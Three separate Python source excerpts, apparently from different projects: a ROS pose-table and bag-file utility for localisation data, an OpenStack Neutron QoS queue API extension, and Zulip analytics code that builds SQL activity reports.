            pgrnd = groundTruthTbl.findNearestInTime (self.table[0].timestamp, tolerance)
            idx = groundTruthTbl.table.index(pgrnd)
            blankDistFront = groundTruthTbl.lengthFrom2Pose (0, idx)
        # Blank distance after our last pose
        blankDistRear = 0
        if groundTruthTbl.last().timestamp > self.table[-1].timestamp :
            pgrnd = groundTruthTbl.findNearestInTime (self.table[-1].timestamp, tolerance)
            idx = groundTruthTbl.table.index (pgrnd)
            blankDistRear = groundTruthTbl.lengthFrom2Pose (idx, len(groundTruthTbl)-1)
        # Blank distances across internal recording gaps
        blankDistMid = 0
        for bPose in self.findBlankTime(tolerance):
            blankDistMid += groundTruthTbl.lengthFrom2Times (bPose[0].timestamp, bPose[1].timestamp)
        return blankDistFront + blankDistMid + blankDistRear

    def saveToBag (self, bagFileName, parentFrame, childFrame, append=False):
        """Write the table as /tf messages to a bag file.

        NOTE(review): uses pose.msgTimestamp as the recording time, so this
        only works for tables produced by loadFromBagFile — confirm.
        """
        from tf2_msgs.msg import TFMessage
        from std_msgs.msg import Header
        from geometry_msgs.msg import Transform, TransformStamped, Vector3, Quaternion
        import rosbag
        def create_tf_message (pose):
            header = Header (stamp=rospy.Time(pose.timestamp))
            tfmsg = TFMessage(transforms = [TransformStamped()])
            tfmsg.transforms[0].header = copy(header)
            tfmsg.transforms[0].header.frame_id = parentFrame
            tfmsg.transforms[0].child_frame_id = childFrame
            tfmsg.transforms[0].transform = Transform()
            tfmsg.transforms[0].transform.translation = Vector3(pose.x, pose.y, pose.z)
            tfmsg.transforms[0].transform.rotation = Quaternion(x=pose.qx,
                                                                y=pose.qy,
                                                                z=pose.qz,
                                                                w=pose.qw)
            return tfmsg
        if append==False :
            bagfile = rosbag.Bag(bagFileName, mode='w')
        else :
            bagfile = rosbag.Bag(bagFileName, mode='a')
        i = 0
        for pose in self.table:
            bagfile.write('/tf', create_tf_message(pose), t=rospy.Time.from_sec(pose.msgTimestamp))
            print ("{} / {}".format(i, len(self.table)))
            i+=1
        bagfile.close()

    def saveToPoseStampedBag (self, filename, topic, frame, append=False):
        """Write the table as PoseStamped messages on `topic` to a bag."""
        if append==False :
            bagfile = rosbag.Bag (filename, mode='w')
        else:
            bagfile = rosbag.Bag (filename, mode='a')
        for pose in self.table:
            posemsg = PoseStamped()
            posemsg.header.frame_id = frame
            posemsg.header.stamp = rospy.Time.from_sec(pose.timestamp)
            posemsg.pose.position.x = pose.x
            posemsg.pose.position.y = pose.y
            posemsg.pose.position.z = pose.z
            posemsg.pose.orientation.x = pose.qx
            posemsg.pose.orientation.y = pose.qy
            posemsg.pose.orientation.z = pose.qz
            posemsg.pose.orientation.w = pose.qw
            bagfile.write(topic, posemsg, t=rospy.Time.from_sec(pose.timestamp))
        bagfile.close()

    @staticmethod
    def loadSegwayStatusFromBag (bagFilename, limitMsg=0) :
        """Dead-reckon a trajectory from Segway status messages in a bag.

        The first message only initialises the timestamp; subsequent
        messages integrate wheel odometry via Pose.segwayMove.  `limitMsg`
        (when non-zero) caps the number of messages processed.
        """
        segwayPose = PoseTable()
        bagsrc = rosbag.Bag(bagFilename, mode='r')
        cPose = Pose()
        cPose.theta = 0.0
        i = 0
        for topic, msg, timestamp in bagsrc.read_messages():
            try:
                if cPose.timestamp == 0:
                    # First message: establish the integration start time.
                    cPose.timestamp = timestamp.to_sec()
                    continue
                x, y, theta = cPose.segwayMove(timestamp.to_sec(),
                                               msg.segway.left_wheel_velocity,
                                               msg.segway.right_wheel_velocity,
                                               msg.segway.yaw_rate)
                cPose.x = x
                cPose.y = y
                cPose.theta = theta
                cPose.timestamp = timestamp.to_sec()
                segwayPose.append (copy(cPose))
                i += 1
                if limitMsg!=0 and i>=limitMsg :
                    break
                print (i)
            except KeyError:
                continue
        return segwayPose

    def increaseTimeResolution (self, numToAdd=10):
        """New table with ~numToAdd interpolated poses inserted between
        every consecutive pair of poses."""
        NewPoseTable = PoseTable()
        for i in range(len(self)-1) :
            p1 = self[i]
            p2 = self[i+1]
            NewPoseTable.append(p1)
            rt = 1.0 / float(numToAdd)
            j = 0.0
            while j < 1.0 :
                j += rt
                NewPoseTable.append(Pose.interpolate(p1, p2, j))
            NewPoseTable.append(p2)
        return NewPoseTable
def joinPoseTables (*poseTbls):
    """Merge several pose tables into one table ordered by time.

    Poses from different tables that lie within twice the finest sampling
    interval of each other are averaged into a single output pose.
    """
    # The finest sampling interval across all tables sets the merge window.
    def timeDiffs (poseTbl) :
        diff = []
        for p in range(1, len(poseTbl.table)):
            cpose = poseTbl.table[p]
            ppose = poseTbl.table[p-1]
            diff.append(cpose.timestamp - ppose.timestamp)
        return diff
    timeRez = min(min(timeDiffs(ptbl)) for ptbl in poseTbls)
    # Pool all poses, remembering each pose's source table so it is never
    # matched against a sibling from the same table.
    poseList = set()
    for ptbl in poseTbls:
        for pose in ptbl.table:
            pose.parent = ptbl
            poseList.add(pose)
    allPosesList = sorted(poseList, key=lambda p: p.timestamp)
    jointPoses = PoseTable()
    for pose in allPosesList:
        if pose not in poseList:
            # Already consumed as a neighbour of an earlier pose.
            continue
        cPoses = [pose]
        for ptbl in poseTbls:
            if pose.parent is ptbl:
                continue
            friend = ptbl.findNearestInTime(pose.timestamp, 2*timeRez)
            if friend is not None and friend in poseList:
                cPoses.append (friend)
        jointPoses.append(Pose.average(*cPoses))
        for p in cPoses:
            poseList.discard(p)
        # For debugging progress
        print ("Length: {} / {}".format(len(jointPoses), len(allPosesList)))
    return jointPoses
def OrbFixOffline (orbLocalisationBagFilename, mapCsv):
    """Correct ORB-SLAM localisation output against an NDT-referenced map.

    Loads ORB localisation poses from a bag, pairs each with its nearest
    map keyframe, converts ORB camera axes to the map frame, and rescales
    each pose's offset using the local NDT/ORB scale ratio.  Returns the
    tuple (orbLoc, orbMap, ndtMap).
    """
    # Keyframe index distance used to estimate the local scale factor.
    offset = 1
    orbLoc = PoseTable.loadFromBagFile(orbLocalisationBagFilename, 'ORB_SLAM/World', 'ORB_SLAM/Camera')
    mapArray = np.loadtxt(mapCsv)
    # Columns 0..7 hold ORB keyframe poses; columns 0, 8..14 the NDT poses.
    orbMapTbl = np.array([[r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7]] for r in mapArray])
    orbMap = PoseTable.loadFromArray(orbMapTbl)
    ndtMapTbl = np.array([[r[0],r[8],r[9],r[10],r[11],r[12],r[13],r[14]] for r in mapArray])
    ndtMap = PoseTable.loadFromArray(ndtMapTbl)
    # Attach each localisation pose to its spatially nearest keyframe.
    for loc in orbLoc.table:
        loc.kfId = orbMap.findNearestByDistance(loc, True)
        loc.kf = orbMap[loc.kfId]
    for pose in orbLoc.table:
        # Fix axes: remap ORB camera coordinates (z, -x, -y) for both the
        # pose and its keyframe.
        x=pose.x
        y=pose.y
        z=pose.z
        pose.x=z
        pose.y=-x
        pose.z=-y
        x=pose.kf.x
        y=pose.kf.y
        z=pose.kf.z
        pose.kf.x=z
        pose.kf.y=-x
        pose.kf.z=-y
        ndtPose = ndtMap[pose.kfId]
        try:
            ndtPoseOffset = ndtMap[pose.kfId-offset]
            kfOffset = orbMap[pose.kfId-offset]
        except KeyError:
            # No neighbouring keyframe to estimate scale from; skip.
            continue
        # Local metric scale: NDT inter-keyframe distance over ORB's.
        scale = np.linalg.norm(ndtPose.coord()-ndtPoseOffset.coord()) / \
            np.linalg.norm(pose.kf.coord()-kfOffset.coord())
        poseRel = Pose(0, ndtPose.x-pose.x, ndtPose.y-pose.y, ndtPose.z-pose.z)
        pose.cx = ndtPose.x + scale*poseRel.x
        pose.cy = ndtPose.y + scale*poseRel.y
        # BUG FIX: was `scale.poseRel.z` — an AttributeError on a float;
        # the intended expression is the multiplication used for cx/cy.
        pose.cz = ndtPose.z + scale*poseRel.z
    return orbLoc, orbMap, ndtMap
# Custom bag reader class
class BagReader (rosbag.Bag):
    """rosbag.Bag opened read-only, with single-message fetch by time."""

    def __init__ (self, bagpath, topicname=None):
        super(BagReader, self).__init__(bagpath, 'r')
        self.rTopicName = topicname

    def readByTime (self, second):
        """Return a copy of the first message on the configured topic at or
        after `second` (seconds since epoch); no-op without a topic."""
        startTime = rospy.Time.from_sec(second)
        if self.rTopicName is not None:
            for _topic, message, _stamp in self.read_messages(topics=self.rTopicName, start_time=startTime):
                if message is None:
                    raise KeyError("Message not found in that time")
                return copy(message)

    def readByCount (self, counter):
        # Not implemented yet.
        pass
def formatResultAsRecords (resultMat):
    """Convert a result matrix with rows [id, t, x, y, z, qx, qy, qz, qw]
    into a PoseTable keyed by the integer id column."""
    records = PoseTable()
    for row in resultMat:
        # Renamed from `id` to avoid shadowing the builtin.
        poseId = int (row[0])
        records[poseId] = Pose(row[1:])
    return records
def flipOrbToNdt (orbPose):
    """Re-express an ORB-SLAM orientation quaternion in the NDT frame by
    post-rotating 90 degrees about X and then Z."""
    quat = [orbPose.qx, orbPose.qy, orbPose.qz, orbPose.qw]
    rotX = trafo.rotation_matrix(np.pi/2, (1,0,0))
    rotZ = trafo.rotation_matrix(np.pi/2, (0,0,1))
    flipped = trafo.concatenate_matrices(trafo.quaternion_matrix(quat), rotX, rotZ)
    return trafo.quaternion_from_matrix(flipped)
def readMessage (bag, topic, timestamp):
    """Return the first message on `topic` at or after `timestamp`
    (seconds since epoch), or None when the bag has none."""
    startTime = rospy.Time.from_sec(timestamp)
    for _topic, msg, _stamp in bag.read_messages(topics=topic, start_time=startTime):
        return msg
if __name__ == '__main__' :
    # Ad-hoc smoke test: load PoseStamped messages from a hard-coded bag.
    poseBag = PoseTable.loadFromPoseStampedBag("/home/sujiwo/Tsukuba2016/data/nagoya/2016-11-18-14-34-25/pose.bag")
    pass
| |
# Copyright 2013 VMware, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import abc
from neutron.api import extensions
from neutron.api.v2 import attributes as attr
from neutron.api.v2 import base
from neutron.common import exceptions as nexception
from neutron import manager
# For policy.json/Auth
# Action names registered with Neutron's policy engine for this extension.
qos_queue_create = "create_qos_queue"
qos_queue_delete = "delete_qos_queue"
qos_queue_get = "get_qos_queue"
qos_queue_list = "get_qos_queues"
class DefaultQueueCreateNotAdmin(nexception.InUse):
    """Raised when a non-admin tries to create the queue named 'default'."""
    message = _("Need to be admin in order to create queue called default")
class DefaultQueueAlreadyExists(nexception.InUse):
    """Raised when a default queue is created but one already exists."""
    message = _("Default queue already exists.")
class QueueInvalidDscp(nexception.InvalidInput):
    """Raised for DSCP values outside the 6-bit range 0..63."""
    message = _("Invalid value for dscp %(data)s must be integer value"
                " between 0 and 63.")
class QueueInvalidMarking(nexception.InvalidInput):
    """Raised when qos_marking 'trusted' is combined with an explicit DSCP."""
    message = _("The qos marking cannot be set to 'trusted' "
                "when the DSCP field is set")
class QueueMinGreaterMax(nexception.InvalidInput):
    """Raised when a queue's min bandwidth exceeds its max bandwidth."""
    message = _("Invalid bandwidth rate, min greater than max.")
class QueueInvalidBandwidth(nexception.InvalidInput):
    """Raised when a bandwidth rate is negative or not an integer."""
    message = _("Invalid bandwidth rate, %(data)s must be a non negative"
                " integer.")
class QueueNotFound(nexception.NotFound):
    """Raised when the requested queue id does not exist."""
    message = _("Queue %(id)s does not exist")
class QueueInUseByPort(nexception.InUse):
    """Raised when deleting a queue that is still attached to a port."""
    message = _("Unable to delete queue attached to port.")
class QueuePortBindingNotFound(nexception.NotFound):
    """Raised when a port has no queue association."""
    message = _("Port is not associated with lqueue")
def convert_to_unsigned_int_or_none(val):
    """Coerce `val` to a non-negative int; None passes through unchanged.

    Raises nexception.InvalidInput when `val` is negative or cannot be
    converted to an integer.
    """
    if val is None:
        return
    try:
        result = int(val)
        if result < 0:
            raise ValueError()
    except (ValueError, TypeError):
        msg = _("'%s' must be a non negative integer.") % val
        raise nexception.InvalidInput(error_message=msg)
    return result
def convert_to_unsigned_int_or_none_max_63(val):
    """Like convert_to_unsigned_int_or_none, but additionally rejects
    values above 63 (DSCP is a 6-bit field); None passes through."""
    val = convert_to_unsigned_int_or_none(val)
    # BUG FIX: under Python 3 `None > 63` raises TypeError, so None
    # (meaning "unset") must be passed through explicitly.  Under Python 2
    # the comparison was False, so behavior is unchanged there.
    if val is not None and val > 63:
        raise QueueInvalidDscp(data=val)
    return val
# As per NSX API, if a queue is trusted, DSCP must be omitted; if a queue is
# untrusted, DSCP must be specified. Whichever default values we choose for
# the tuple (qos_marking, dscp), there will be at least one combination of a
# request with conflicting values: for instance given the default values below,
# requests with qos_marking = 'trusted' and the default dscp value will fail.
# In order to avoid API users to explicitly specify a setting for clearing
# the DSCP field when a trusted queue is created, the code serving this API
# will adopt the following behaviour when qos_marking is set to 'trusted':
# - if the DSCP attribute is set to the default value (0), silently drop
# its value
# - if the DSCP attribute is set to anything than 0 (but still a valid DSCP
# value) return a 400 error as qos_marking and DSCP setting conflict.
# TODO(salv-orlando): Evaluate whether it will be possible from a backward
# compatibility perspective to change the default value for DSCP in order to
# avoid this peculiar behaviour
# Attribute schema for the qos_queues collection (see the note above on
# the qos_marking/dscp default interplay).
RESOURCE_ATTRIBUTE_MAP = {
    'qos_queues': {
        'id': {'allow_post': False, 'allow_put': False,
               'is_visible': True},
        'default': {'allow_post': True, 'allow_put': False,
                    'convert_to': attr.convert_to_boolean,
                    'is_visible': True, 'default': False},
        'name': {'allow_post': True, 'allow_put': False,
                 'validate': {'type:string': attr.NAME_MAX_LEN},
                 'is_visible': True, 'default': ''},
        'min': {'allow_post': True, 'allow_put': False,
                'is_visible': True, 'default': '0',
                'convert_to': convert_to_unsigned_int_or_none},
        'max': {'allow_post': True, 'allow_put': False,
                'is_visible': True, 'default': None,
                'convert_to': convert_to_unsigned_int_or_none},
        'qos_marking': {'allow_post': True, 'allow_put': False,
                        'validate': {'type:values': ['untrusted', 'trusted']},
                        'default': 'untrusted', 'is_visible': True},
        'dscp': {'allow_post': True, 'allow_put': False,
                 'is_visible': True, 'default': '0',
                 'convert_to': convert_to_unsigned_int_or_none_max_63},
        'tenant_id': {'allow_post': True, 'allow_put': False,
                      'required_by_policy': True,
                      'validate': {'type:string': attr.TENANT_ID_MAX_LEN},
                      'is_visible': True},
    },
}


QUEUE = 'queue_id'
RXTX_FACTOR = 'rxtx_factor'

# Extra attributes grafted onto the core ports/networks resources when
# this extension is active.
EXTENDED_ATTRIBUTES_2_0 = {
    'ports': {
        RXTX_FACTOR: {'allow_post': True,
                      # FIXME(arosen): the plugin currently does not
                      # implement updating rxtx factor on port.
                      'allow_put': True,
                      'is_visible': False,
                      'default': 1,
                      'enforce_policy': True,
                      'convert_to': attr.convert_to_positive_float_or_none},

        QUEUE: {'allow_post': False,
                'allow_put': False,
                'is_visible': True,
                'default': False,
                'enforce_policy': True}},
    'networks': {QUEUE: {'allow_post': True,
                         'allow_put': True,
                         'is_visible': True,
                         'default': False,
                         'enforce_policy': True}}

}
class Qos(extensions.ExtensionDescriptor):
    """Port Queue extension."""

    @classmethod
    def get_name(cls):
        return "QoS Queue"

    @classmethod
    def get_alias(cls):
        return "qos-queue"

    @classmethod
    def get_description(cls):
        return "NSX QoS extension."

    @classmethod
    def get_updated(cls):
        return "2014-01-01T00:00:00-00:00"

    @classmethod
    def get_resources(cls):
        """Returns Ext Resources."""
        plugin = manager.NeutronManager.get_plugin()
        resource = 'qos_queue'
        collection = resource.replace('_', '-') + "s"
        attr_params = RESOURCE_ATTRIBUTE_MAP.get(resource + "s", dict())
        queue_controller = base.create_resource(collection,
                                                resource,
                                                plugin, attr_params,
                                                allow_bulk=False)
        return [extensions.ResourceExtension(collection, queue_controller)]

    def get_extended_resources(self, version):
        # Only API v2.0 carries the extra port/network attributes.
        if version != "2.0":
            return {}
        return dict(EXTENDED_ATTRIBUTES_2_0.items() +
                    RESOURCE_ATTRIBUTE_MAP.items())
class QueuePluginBase(object):
    """Abstract CRUD interface that plugins supporting QoS queues implement."""
    @abc.abstractmethod
    def create_qos_queue(self, context, queue):
        """Create a QoS queue from the request body in `queue`."""
        pass

    @abc.abstractmethod
    def delete_qos_queue(self, context, id):
        """Delete the QoS queue with the given id."""
        pass

    @abc.abstractmethod
    def get_qos_queue(self, context, id, fields=None):
        """Return the QoS queue with the given id."""
        pass

    @abc.abstractmethod
    def get_qos_queues(self, context, filters=None, fields=None, sorts=None,
                       limit=None, marker=None, page_reverse=False):
        """List QoS queues matching the given filters."""
        pass
| |
from django.db import connection
from django.template import RequestContext, loader
from django.utils.html import mark_safe
from django.shortcuts import render_to_response
from django.core import urlresolvers
from django.http import HttpResponseNotFound
from zerver.decorator import has_request_variables, REQ, zulip_internal
from zerver.models import get_realm, UserActivity, UserActivityInterval, Realm
from zerver.lib.timestamp import timestamp_to_datetime
from collections import defaultdict
from datetime import datetime, timedelta
import itertools
import time
import re
import pytz
# Display timezone used when rendering report timestamps.
eastern_tz = pytz.timezone('US/Eastern')
def make_table(title, cols, rows, has_row_class=False):
    """Render `rows`/`cols` through the ad-hoc-query template.

    Unless has_row_class is set, each row is first wrapped as
    dict(cells=row, row_class=None), the shape the template expects.
    """
    if not has_row_class:
        rows = [dict(cells=row, row_class=None) for row in rows]
    data = dict(title=title, cols=cols, rows=rows)
    return loader.render_to_string(
        'analytics/ad_hoc_query.html',
        dict(data=data)
    )
def dictfetchall(cursor):
    """Return every remaining row from `cursor` as a dict keyed by the
    column names in cursor.description."""
    columns = [col[0] for col in cursor.description]
    return [dict(zip(columns, values)) for values in cursor.fetchall()]
def get_realm_day_counts():
    """Return per-realm human message counts for each of the last 8 days.

    Result maps domain -> dict(cnts=<HTML cell string>); each day's cell
    is colour-coded: the realm's quietest day is 'bad', its busiest day
    'good', everything else 'neutral'.
    """
    # Count non-bot messages per realm per day over the trailing 8 days,
    # excluding mirrored/monitoring clients.
    query = '''
        select
            r.domain,
            (now()::date - pub_date::date) age,
            count(*) cnt
        from zerver_message m
        join zerver_userprofile up on up.id = m.sender_id
        join zerver_realm r on r.id = up.realm_id
        join zerver_client c on c.id = m.sending_client_id
        where
            (not up.is_bot)
        and
            pub_date > now()::date - interval '8 day'
        and
            c.name not in ('zephyr_mirror', 'ZulipMonitoring')
        group by
            r.domain,
            age
        order by
            r.domain,
            age
    '''
    cursor = connection.cursor()
    cursor.execute(query)
    rows = dictfetchall(cursor)
    cursor.close()
    # counts: domain -> {age in days -> message count}
    counts = defaultdict(dict)
    for row in rows:
        counts[row['domain']][row['age']] = row['cnt']
    result = {}
    for domain in counts:
        # Fill days with no messages with 0 so every realm has 8 cells.
        cnts = [counts[domain].get(age, 0) for age in range(8)]
        min_cnt = min(cnts)
        max_cnt = max(cnts)
        def format_count(cnt):
            # Closure over this iteration's min_cnt/max_cnt; it is consumed
            # immediately by the map() below, so late binding is safe here.
            if cnt == min_cnt:
                good_bad = 'bad'
            elif cnt == max_cnt:
                good_bad = 'good'
            else:
                good_bad = 'neutral'
            return '<td class="number %s">%s</td>' % (good_bad, cnt)
        cnts = ''.join(map(format_count, cnts))
        result[domain] = dict(cnts=cnts)
    return result
def realm_summary_table(realm_minutes):
    """Build the per-realm summary HTML table.

    realm_minutes: dict mapping realm domain -> minutes of user activity
    over the last day (as produced by user_activity_intervals()).
    """
    query = '''
        SELECT
            realm.domain,
            coalesce(user_counts.active_user_count, 0) active_user_count,
            coalesce(at_risk_counts.at_risk_count, 0) at_risk_count,
            (
                SELECT
                    count(*)
                FROM zerver_userprofile up
                WHERE up.realm_id = realm.id
                AND is_active
                AND not is_bot
            ) user_profile_count,
            (
                SELECT
                    count(*)
                FROM zerver_userprofile up
                WHERE up.realm_id = realm.id
                AND is_active
                AND is_bot
            ) bot_count
        FROM zerver_realm realm
        LEFT OUTER JOIN
            (
                SELECT
                    up.realm_id realm_id,
                    count(distinct(ua.user_profile_id)) active_user_count
                FROM zerver_useractivity ua
                JOIN zerver_userprofile up
                    ON up.id = ua.user_profile_id
                WHERE
                    query in (
                        '/json/send_message',
                        'send_message_backend',
                        '/api/v1/send_message',
                        '/json/update_pointer'
                    )
                AND
                    last_visit > now() - interval '1 day'
                AND
                    not is_bot
                GROUP BY realm_id
            ) user_counts
            ON user_counts.realm_id = realm.id
        LEFT OUTER JOIN
            (
                SELECT
                    realm_id,
                    count(*) at_risk_count
                FROM (
                    SELECT
                        realm.id as realm_id,
                        up.email
                    FROM zerver_useractivity ua
                    JOIN zerver_userprofile up
                        ON up.id = ua.user_profile_id
                    JOIN zerver_realm realm
                        ON realm.id = up.realm_id
                    WHERE up.is_active
                    AND (not up.is_bot)
                    AND
                        ua.query in (
                            '/json/send_message',
                            'send_message_backend',
                            '/api/v1/send_message',
                            '/json/update_pointer'
                        )
                    GROUP by realm.id, up.email
                    HAVING max(last_visit) between
                        now() - interval '7 day' and
                        now() - interval '1 day'
                ) as at_risk_users
                GROUP BY realm_id
            ) at_risk_counts
            ON at_risk_counts.realm_id = realm.id
        WHERE EXISTS (
                SELECT *
                FROM zerver_useractivity ua
                JOIN zerver_userprofile up
                    ON up.id = ua.user_profile_id
                WHERE
                    query in (
                        '/json/send_message',
                        '/api/v1/send_message',
                        'send_message_backend',
                        '/json/update_pointer'
                    )
                AND
                    up.realm_id = realm.id
                AND
                    last_visit > now() - interval '2 week'
        )
        ORDER BY active_user_count DESC, domain ASC
    '''
    cursor = connection.cursor()
    cursor.execute(query)
    rows = dictfetchall(cursor)
    cursor.close()

    # get messages sent per day
    counts = get_realm_day_counts()
    for row in rows:
        try:
            row['history'] = counts[row['domain']]['cnts']
        except KeyError:
            # Realms with no recent traffic have no day-count entry.
            row['history'] = ''

    # augment data with realm_minutes
    total_hours = 0
    for row in rows:
        domain = row['domain']
        minutes = realm_minutes.get(domain, 0)
        hours = minutes / 60.0
        total_hours += hours
        row['hours'] = str(int(hours))
        try:
            row['hours_per_user'] = '%.1f' % (hours / row['active_user_count'],)
        except ZeroDivisionError:
            # No active users: leave hours_per_user unset for the template.
            pass

    # formatting
    for row in rows:
        row['domain'] = realm_activity_link(row['domain'])

    # Count active sites (>= 5 active users).  Use a generator rather than
    # len(filter(...)) so this also works on Python 3, where filter() is lazy.
    num_active_sites = sum(1 for row in rows if row['active_user_count'] >= 5)

    # create totals
    total_active_user_count = 0
    total_user_profile_count = 0
    total_bot_count = 0
    for row in rows:
        total_active_user_count += int(row['active_user_count'])
        total_user_profile_count += int(row['user_profile_count'])
        total_bot_count += int(row['bot_count'])

    rows.append(dict(
        domain='Total',
        active_user_count=total_active_user_count,
        user_profile_count=total_user_profile_count,
        bot_count=total_bot_count,
        hours=int(total_hours)
    ))

    content = loader.render_to_string(
        'analytics/realm_summary_table.html',
        dict(rows=rows, num_active_sites=num_active_sites)
    )
    return content
def user_activity_intervals():
    """Summarize per-user online duration over the last 24 hours.

    Returns (html_content, realm_minutes) where realm_minutes maps each
    realm domain to its total minutes of user activity in the window.
    """
    day_end = timestamp_to_datetime(time.time())
    day_start = day_end - timedelta(hours=24)

    output = "Per-user online duration for the last 24 hours:\n"
    total_duration = timedelta(0)

    all_intervals = UserActivityInterval.objects.filter(
        end__gte=day_start,
        start__lte=day_end
    ).select_related(
        'user_profile',
        'user_profile__realm'
    ).only(
        'start',
        'end',
        'user_profile__email',
        'user_profile__realm__domain'
    ).order_by(
        'user_profile__realm__domain',
        'user_profile__email'
    )

    def by_domain(interval):
        return interval.user_profile.realm.domain

    def by_email(interval):
        return interval.user_profile.email

    realm_minutes = {}
    # groupby relies on the order_by clause above for correct grouping.
    for domain, realm_intervals in itertools.groupby(all_intervals, by_domain):
        realm_duration = timedelta(0)
        output += '<hr>%s\n' % (domain,)
        for email, intervals in itertools.groupby(realm_intervals, by_email):
            duration = timedelta(0)
            for interval in intervals:
                # Clamp each interval to the 24-hour window before summing.
                duration += min(day_end, interval.end) - max(day_start, interval.start)
            total_duration += duration
            realm_duration += duration
            output += "  %-*s%s\n" % (37, email, duration, )
        realm_minutes[domain] = realm_duration.total_seconds() / 60

    output += "\nTotal Duration: %s\n" % (total_duration,)
    output += "\nTotal Duration in minutes: %s\n" % (total_duration.total_seconds() / 60.,)
    output += "Total Duration amortized to a month: %s" % (total_duration.total_seconds() * 30. / 60.,)
    content = mark_safe('<pre>' + output + '</pre>')
    return content, realm_minutes
def sent_messages_report(realm):
    """Two-week daily message-count history for one realm, split into
    human vs. bot senders.

    realm: realm domain string; passed as a SQL parameter.
    Returns rendered HTML via make_table().
    """
    title = 'Recently sent messages for ' + realm
    cols = [
        'Date',
        'Humans',
        'Bots'
    ]
    # generate_series produces one row per calendar day so days with no
    # traffic still appear in the report (with NULL counts).
    query = '''
        select
            series.day::date,
            humans.cnt,
            bots.cnt
        from (
            select generate_series(
                (now()::date - interval '2 week'),
                now()::date,
                interval '1 day'
            ) as day
        ) as series
        left join (
            select
                pub_date::date pub_date,
                count(*) cnt
            from zerver_message m
            join zerver_userprofile up on up.id = m.sender_id
            join zerver_realm r on r.id = up.realm_id
            where
                r.domain = %s
            and
                (not up.is_bot)
            and
                pub_date > now() - interval '2 week'
            group by
                pub_date::date
            order by
                pub_date::date
        ) humans on
            series.day = humans.pub_date
        left join (
            select
                pub_date::date pub_date,
                count(*) cnt
            from zerver_message m
            join zerver_userprofile up on up.id = m.sender_id
            join zerver_realm r on r.id = up.realm_id
            where
                r.domain = %s
            and
                up.is_bot
            and
                pub_date > now() - interval '2 week'
            group by
                pub_date::date
            order by
                pub_date::date
        ) bots on
            series.day = bots.pub_date
    '''
    cursor = connection.cursor()
    # Parameterized execution: realm comes from the URL and is untrusted.
    cursor.execute(query, [realm, realm])
    rows = cursor.fetchall()
    cursor.close()
    return make_table(title, cols, rows)
def ad_hoc_queries():
    """Run the canned operational SQL reports and return a list of dicts,
    each with a 'title' and rendered HTML 'content'."""
    def get_page(query, cols, title):
        # Execute one report query and render it as a table, linkifying
        # domain columns and formatting timestamp columns.
        cursor = connection.cursor()
        cursor.execute(query)
        rows = cursor.fetchall()
        # NOTE(review): rows is iterated more than once below (fix_rows and
        # make_table); this relies on Python 2's map() returning a list --
        # Python 3 would need list(map(...)).  Confirm before porting.
        rows = map(list, rows)
        cursor.close()
        def fix_rows(i, fixup_func):
            # Rewrite column i of every row in place.
            for row in rows:
                row[i] = fixup_func(row[i])
        for i, col in enumerate(cols):
            if col == 'Domain':
                fix_rows(i, realm_activity_link)
            elif col in ['Last time', 'Last visit']:
                fix_rows(i, format_date_for_activity_reports)
        content = make_table(title, cols, rows)
        return dict(
            content=content,
            title=title
        )
    pages = []
    ###
    # Mobile client usage.  The client name is interpolated directly into
    # the SQL; this is safe only because it comes from the fixed list below.
    for mobile_type in ['Android', 'ZulipiOS']:
        title = '%s usage' % (mobile_type,)
        query = '''
            select
                realm.domain,
                up.id user_id,
                client.name,
                sum(count) as hits,
                max(last_visit) as last_time
            from zerver_useractivity ua
            join zerver_client client on client.id = ua.client_id
            join zerver_userprofile up on up.id = ua.user_profile_id
            join zerver_realm realm on realm.id = up.realm_id
            where
                client.name like '%s'
            group by domain, up.id, client.name
            having max(last_visit) > now() - interval '2 week'
            order by domain, up.id, client.name
        ''' % (mobile_type,)
        cols = [
            'Domain',
            'User id',
            'Name',
            'Hits',
            'Last time'
        ]
        pages.append(get_page(query, cols, title))
    ###
    title = 'Desktop users'
    # NOTE(review): the '%%' escapes below assume the DB driver performs
    # %-substitution even when execute() is called without parameters --
    # verify against the driver in use.
    query = '''
        select
            realm.domain,
            client.name,
            sum(count) as hits,
            max(last_visit) as last_time
        from zerver_useractivity ua
        join zerver_client client on client.id = ua.client_id
        join zerver_userprofile up on up.id = ua.user_profile_id
        join zerver_realm realm on realm.id = up.realm_id
        where
            client.name like 'desktop%%'
        group by domain, client.name
        having max(last_visit) > now() - interval '2 week'
        order by domain, client.name
    '''
    cols = [
        'Domain',
        'Client',
        'Hits',
        'Last time'
    ]
    pages.append(get_page(query, cols, title))
    ###
    # Integration traffic, grouped by realm; webhook-style requests are
    # attributed to the integration name parsed out of the query path.
    title = 'Integrations by domain'
    query = '''
        select
            realm.domain,
            case
                when query like '%%external%%' then split_part(query, '/', 5)
                else client.name
            end client_name,
            sum(count) as hits,
            max(last_visit) as last_time
        from zerver_useractivity ua
        join zerver_client client on client.id = ua.client_id
        join zerver_userprofile up on up.id = ua.user_profile_id
        join zerver_realm realm on realm.id = up.realm_id
        where
            (query in ('send_message_backend', '/api/v1/send_message')
            and client.name not in ('Android', 'ZulipiOS')
            and client.name not like 'test: Zulip%%'
            )
        or
            query like '%%external%%'
        group by domain, client_name
        having max(last_visit) > now() - interval '2 week'
        order by domain, client_name
    '''
    cols = [
        'Domain',
        'Client',
        'Hits',
        'Last time'
    ]
    pages.append(get_page(query, cols, title))
    ###
    # Same data as above, grouped by client first.
    title = 'Integrations by client'
    query = '''
        select
            case
                when query like '%%external%%' then split_part(query, '/', 5)
                else client.name
            end client_name,
            realm.domain,
            sum(count) as hits,
            max(last_visit) as last_time
        from zerver_useractivity ua
        join zerver_client client on client.id = ua.client_id
        join zerver_userprofile up on up.id = ua.user_profile_id
        join zerver_realm realm on realm.id = up.realm_id
        where
            (query in ('send_message_backend', '/api/v1/send_message')
            and client.name not in ('Android', 'ZulipiOS')
            and client.name not like 'test: Zulip%%'
            )
        or
            query like '%%external%%'
        group by client_name, domain
        having max(last_visit) > now() - interval '2 week'
        order by client_name, domain
    '''
    cols = [
        'Client',
        'Domain',
        'Hits',
        'Last time'
    ]
    pages.append(get_page(query, cols, title))
    return pages
@zulip_internal
@has_request_variables
